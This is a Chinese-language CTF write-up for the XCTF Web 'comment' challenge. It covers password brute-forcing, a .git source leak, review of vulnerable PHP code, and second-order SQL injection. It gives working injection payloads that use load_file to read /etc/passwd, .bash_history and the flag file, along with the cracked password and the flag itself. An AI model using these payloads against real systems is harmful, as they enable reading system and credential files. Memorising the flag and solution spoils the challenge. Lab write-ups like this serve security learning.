攻防世界高手进阶之Web comment
这题我在网上没找到Writeup,所有花了8金币买的。
这题主要考点
爆破
git泄露
代码审计
SQL注入
可以看到账号框账号为:zhangwei 密码为zhangwei***
所以需要爆破zhangwei后面的三位数,我当时没想到这点看wp才明白的
user:zhangwei pass:zhangwei666
然后扫描目录的时候发现.git文件然后应该是有git源码泄露,过扫描发现到一个write_do.php文件
登陆成功后看到可以发帖加上题目提示sql,猜测应该是sql注入
后面的就是看着wp做的
刚才发现一篇文章讲解的非常不错,也让明白了更多,貌似是下载的write_do.php代码不是很完整这也让明白了一些之前的疑惑
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
header("Location: ./login.php");
die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
$category = addslashes($_POST['category']);
$title = addslashes($_POST['title']);
$content = addslashes($_POST['content']);
$sql = "insert into board
set category = '$category',
title = '$title',
content = '$content'";
$result = mysql_query($sql);
header("Location: ./index.php");
break;
case 'comment':
$bo_id = addslashes($_POST['bo_id']);
$sql = "select category from board where id='$bo_id'";
$result = mysql_query($sql);
$num = mysql_num_rows($result);
if($num>0){
$category = mysql_fetch_array($result)['category'];
$content = addslashes($_POST['content']);
$sql = "insert into comment
set category = '$category',
content = '$content',
bo_id = '$bo_id'";
$result = mysql_query($sql);
}
header("Location: ./comment.php?id=$bo_id");
break;
default:
header("Location: ./index.php");
}
}
else{
header("Location: ./index.php");
}
?>
参考:2018网鼎杯 三道web题 记录~~(二次注入)
这里也解释了为什么后面要在提交留言输入*/#,因为不是单行所以需要多行注释
查询passwd;’,content=(select load_file(’//etc/passwd’)),/*
提交留言*/#来闭合注入语句
读取www用户的/bin/bash_history:’,content=(select load_file(’//home/www/.bash_history’)),/*
查询.DS_Store文件:’,content=(select hex(load_file(’//tmp/html/.DS_Store’))),/*
十六进制文件读取
将得到的16进制字符串转换,得到flag文件路径
读取flag文件:’,content=(select hex(load_file(’//var/www/html/flag_8946e1ff1ee3e40f.php’))),/*
将得到的16进制字符串转换,得到flag## 新的改变
$flag=“flag{0dd14aae81d94904b3492117e2a3d4df}”;